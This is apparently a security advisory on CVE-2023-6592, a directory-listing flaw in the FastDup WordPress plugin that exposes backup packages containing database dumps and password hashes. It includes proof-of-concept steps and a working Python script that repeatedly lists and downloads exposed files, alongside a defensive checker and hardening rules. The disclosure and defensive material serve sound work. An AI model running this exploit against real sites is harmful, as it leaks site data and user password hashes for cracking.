A critical vulnerability has been found in the FastDup – Fastest WordPress Migration & Duplicator plugin: the directory wordpress/wp-content/njt-fastdup/packages, where the plugin stores its backup packages, is served with directory listing enabled. Anyone who can reach the site can enumerate and download the packages, which exposes extensive information about the WordPress installation, including its configuration, directory layout and files. More seriously, each package carries a database dump, so the flaw gives unauthorized access to everything in the database, including user password hashes. An attacker who obtains a package can crack those hashes offline and, from there, take over accounts and compromise the whole system.
Main info:

| Field | Value |
|---|---|
| CVE | CVE-2023-6592 |
| Plugin | FastDup – Fastest WordPress Migration & Duplicator < 2.2 |
| Severity | Critical (Super High) |
| All time (downloads) | 48 596 |
| Active installations | 4 000+ |
| Publicly published | January 16, 2024 |
| Last updated | January 16, 2024 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | Yes |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6592 , https://wpscan.com/vulnerability/a39bb807-b143-4863-88ff-1783e407d7d4/ |
Timeline

| Date | Event |
|---|---|
| November 22, 2023 | Plugin testing completed and the vulnerability in FastDup – Fastest WordPress Migration & Duplicator detected |
| November 22, 2023 | Contacted the plugin author with a PoC, a description of the vulnerability and recommendations for fixing it |
| January 8, 2024 | The author fixed the vulnerability and released the plugin update |
| January 16, 2024 | CVE-2023-6592 registered |
Discovery of the Vulnerability
While testing the plugin, the backup storage directory wordpress/wp-content/njt-fastdup/packages was found to be browsable from the web, so anyone who can reach the site can list and download the backup packages written there. A package contains the site's files and configuration together with a database dump; its exposure therefore hands an attacker the complete contents of the database, including user password hashes. Offline cracking of those hashes can then lead to account takeover and compromise of the entire system.
Understanding Directory Listing Attacks
Directory listing vulnerabilities, such as the one found in FastDup, arise when the web server is configured to render the contents of a directory that has no index file instead of refusing the request. In WordPress, everything under wp-content is served directly by the web server, so a plugin that writes backups, logs or temporary files there without its own access control exposes them to anyone who knows or guesses the path. Real-world consequences range from leaked file names and configuration details to, as with FastDup, the download of complete backup packages and with them the database contents and user password hashes.
Exploiting the Directory Listing Vulnerability
Exploiting this directory listing vulnerability involves navigating to the exposed directory, wordpress/wp-content/njt-fastdup/packages, reading the listing and downloading the backup packages it shows. An attacker can extract the database dump from a package, including the hashed user passwords, and run an offline brute-force or dictionary attack against the hashes, jeopardizing the security of user accounts and, consequently, the entire WordPress installation.
POC:
1) Run the backup function from the plugin page: http://your_site/wordpress/wp-admin/admin.php?page=njt-fastdup#/
2) While the backup is being created, the following directories can be browsed and their contents read:
wordpress/wp-content/plugins/fastdup/logs
wordpress/wp-content/njt-fastdup/tmp
3) After the backup completes, open /wordpress/wp-content/njt-fastdup/packages/ and all backup files inside the directory are listed and downloadable
EXPLOIT (python3):

```python
import time
from urllib.parse import urljoin

import requests
from bs4 import BeautifulSoup

# Plugin log directory that becomes browsable while a backup is being created
url = "http://127.0.0.1/wordpress/wp-content/plugins/fastdup/logs/"


def check_files():
    # Perform an HTTP request for the directory index
    response = requests.get(url)
    # Check the success of the request
    if response.status_code == 200:
        # Use BeautifulSoup to parse the HTML listing
        soup = BeautifulSoup(response.text, 'html.parser')
        # Find all links to files
        file_links = soup.find_all('a', href=True)
        if file_links:
            for link in file_links:
                href = link['href']
                # Resolve the entry against the directory URL (entries are relative)
                file_url = urljoin(url, href)
                # Skip the listing's own navigation links: column sorting,
                # the parent directory and anything outside this directory
                if href.startswith('?') or file_url == url or not file_url.startswith(url):
                    continue
                # Perform an HTTP request to download the file
                file_response = requests.get(file_url)
                if file_response.status_code == 200:
                    # Output the file name
                    print("File Name:", href)
                    # Output the file content
                    print("File Content:", file_response.text)
                    print("-" * 50)
                else:
                    print(f"Failed to retrieve the file {href}")
        else:
            print("There are no files in the directory.")
    else:
        print(f"Failed to access {url}. Response code: {response.status_code}")


# Infinite loop with a check every 3 seconds, so files written
# during backup creation are caught before they are cleaned up
while True:
    check_files()
    time.sleep(3)
```
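As an added check, not part of the original advisory or of the FastDup code, the following script tests the three paths named in the PoC and reports, per path, whether the server returns a browsable listing (exposed), refuses the request (denied), has nothing there (absent), or something else (unclear). It parses the listing the way the exploit above does, but with the standard library only and without downloading any file, so it is safe to run against your own site. The default site URL, the user-agent string and the sample listing with its file names are constructed for this example.

```python
import sys
from html.parser import HTMLParser
from urllib.error import HTTPError, URLError
from urllib.parse import urljoin
from urllib.request import Request, urlopen

# Directories named in the PoC, relative to the WordPress root: packages
# holds finished backups; logs and tmp are written while a backup runs.
EXPOSED_PATHS = (
    "wp-content/njt-fastdup/packages/",
    "wp-content/njt-fastdup/tmp/",
    "wp-content/plugins/fastdup/logs/",
)


class _IndexParser(HTMLParser):
    """Collects the <title> text and every href on an autoindex page."""

    def __init__(self):
        super().__init__()
        self.title, self.hrefs, self._in_title = "", [], False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "a":
            self.hrefs += [v for k, v in attrs if k == "href" and v]

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def parse_index(html):
    """Return (title, hrefs) of a directory index page."""
    p = _IndexParser()
    p.feed(html)
    return p.title.strip(), p.hrefs


def listing_entries(html, base):
    """Children shown on the index page at `base` (a URL ending in '/').
    Column-sort links ('?C=N;O=D'), the parent directory and links that
    point outside `base` are navigation, not entries, and are dropped."""
    entries = []
    for href in parse_index(html)[1]:
        if href.startswith(("?", "#")):
            continue
        resolved = urljoin(base, href)
        if resolved != base and resolved.startswith(base):
            entries.append(resolved[len(base):])
    return entries


def classify(status, html, base):
    """Verdict for one response: exposed, denied, absent or unclear. A 200
    titled 'Index of ...' (Apache and nginx both emit it) counts as exposed
    even when the directory is still empty, since listing is switched on."""
    if status == 200:
        title, _ = parse_index(html)
        if listing_entries(html, base) or title.startswith("Index of"):
            return "exposed"
    if status in (401, 403):
        return "denied"
    if status == 404:
        return "absent"
    return "unclear"  # plain 200, redirect, 5xx or network error (status 0)


def fetch(url, timeout=10):
    """GET `url` and return (status, body); HTTP errors are returned rather
    than raised, and a network failure comes back as status 0."""
    req = Request(url, headers={"User-Agent": "fastdup-exposure-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.getcode(), resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")
    except URLError as err:
        return 0, str(err.reason)


def scan(site_root):
    """Map each exposed path under `site_root` to its verdict."""
    root = site_root.rstrip("/") + "/"
    return {url: classify(*fetch(url), url)
            for url in (urljoin(root, p) for p in EXPOSED_PATHS)}


# Constructed Apache-style listing used as sample input for the functions
# above; the file names are made up for this example.
SAMPLE_BASE = "http://127.0.0.1/wordpress/wp-content/njt-fastdup/packages/"
SAMPLE_LISTING = """<html><head><title>Index of /wordpress/wp-content/njt-fastdup/packages</title>
</head><body><h1>Index of /wordpress/wp-content/njt-fastdup/packages</h1>
<a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a>
<a href="/wordpress/wp-content/njt-fastdup/">Parent Directory</a>
<a href="site-backup-example.zip">site-backup-example.zip</a>
<a href="site-backup-example.sql">site-backup-example.sql</a>
</body></html>"""

if __name__ == "__main__":
    # Usage: python3 fastdup_check.py http://your_site/wordpress/
    root = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1/wordpress/"
    for url, verdict in scan(root).items():
        print(f"{verdict:8s} {url}")
```

Run it once before and once during a backup: the logs and tmp directories only exist while the plugin is writing, so a site can look clean between backups and still be exposed. A "denied" verdict for all three paths after updating the plugin or adding the web-server rules from the recommendations below is the result you want; "exposed" on an empty directory still means listing is enabled and the next backup will be visible.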
___
The potential risks associated with this vulnerability are severe and multifaceted. In real-world scenarios, an attacker could:
- Unauthorized Access: read and download everything in the exposed directories, including complete backup packages, logs and temporary files.
- Database Compromise: extract the database dump from a package and with it all stored data, including user password hashes.
- Brute Force Attacks: run offline brute-force or dictionary attacks on the exposed password hashes, leading to account takeover and potential compromise of the whole system.
This vulnerability not only jeopardizes the immediate security of the affected WordPress site but could also lead to broader consequences if the leaked data is used maliciously.
Recommendations for Improved Security
- Immediate Update: update FastDup to version 2.2 or later, where the author fixed this directory listing vulnerability; if you cannot update, deactivate the plugin until you can.
- Directory Permissions: disable directory listing on the web server (Options -Indexes on Apache, autoindex off on nginx) and deny web access to wp-content/njt-fastdup/ altogether, so that even a guessed file name cannot be downloaded; remove old backup packages from the web root once they are no longer needed.
- Password Security: if a package may already have been downloaded, treat its contents as leaked: reset user passwords and rotate the secrets stored in the site configuration. Beyond that, encourage or enforce robust password policies, including strong, unique passwords.
- Security Audits: conduct thorough security audits to identify and rectify any other potential vulnerabilities within the WordPress system, including other plugins that write backups or logs under wp-content.
By implementing these measures, administrators can significantly enhance the security of their WordPress sites, mitigating the risks associated with the FastDup directory listing vulnerability.
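As an added hardening example, not from the advisory or the FastDup project, here is an Apache .htaccess for the wp-content/njt-fastdup/ directory named above, showing the weak default beside the corrected setting. The directory path is the one from the PoC; that the site runs Apache with AllowOverride covering Options and Limit/AuthConfig is an assumption of the example, and the nginx equivalent is given in prose afterwards.

```apache
# Added hardening example (not from the advisory or the plugin).
# Place as wp-content/njt-fastdup/.htaccess; requires AllowOverride
# for the Options and authorization directives used here.

# Weak: the default on many hosts lets mod_autoindex render a listing
# whenever a directory has no index file, which is exactly what exposed
# the backup packages here.
# Options +Indexes

# Corrected, step 1: never render listings for this tree.
Options -Indexes

# Corrected, step 2: refuse every web request for the tree, because
# step 1 alone still lets anyone who guesses a package name download it.
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>
```

On nginx the same effect comes from a `location ^~ /wp-content/njt-fastdup/ { autoindex off; deny all; }` block inside the server block, since nginx ignores .htaccess. After applying either, re-run a backup and confirm the directory answers 403; if the plugin's own download of a package stops working because it fetched the file by direct URL, keep the deny rule and retrieve packages over SFTP instead rather than reopening the directory.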
#WordPressSecurity #DirectoryListing #WebsiteSafety #StayProtected #SuperHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.